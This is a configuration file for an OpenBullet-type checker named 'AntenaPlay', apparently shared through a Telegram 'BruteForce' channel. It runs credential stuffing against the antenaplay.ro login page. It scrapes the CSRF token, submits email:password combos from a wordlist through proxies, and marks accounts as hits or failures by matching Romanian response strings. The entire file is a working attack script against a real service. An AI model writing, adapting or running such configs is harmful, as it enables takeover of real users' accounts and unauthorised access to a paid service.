[SETTINGS]
{
  "Name": "AntenaPlay",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-14T00:55:29.0443223+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | No Capture | ",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Get REQUEST GET "https://antenaplay.ro/intra-in-cont" 
  
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://antenaplay.ro" 
  HEADER "referer: https://antenaplay.ro/intra-in-cont" 

#Tok PARSE "<SOURCE>" LR "csrf-token\" content=\"" "\" />" -> VAR "Tok" 

#Post REQUEST POST "https://antenaplay.ro/intra-in-cont" 
  CONTENT "email=<USER>&password=<PASS>&_token=<Tok>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://antenaplay.ro" 
  HEADER "referer: https://antenaplay.ro/intra-in-cont" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Deconectare" 
  KEYCHAIN Failure OR 
    KEY "Datele de autentificare sunt incorecte." 

#CC FUNCTION Constant " T.me/BruteForce " -> CAP "Telegram Channel:" 

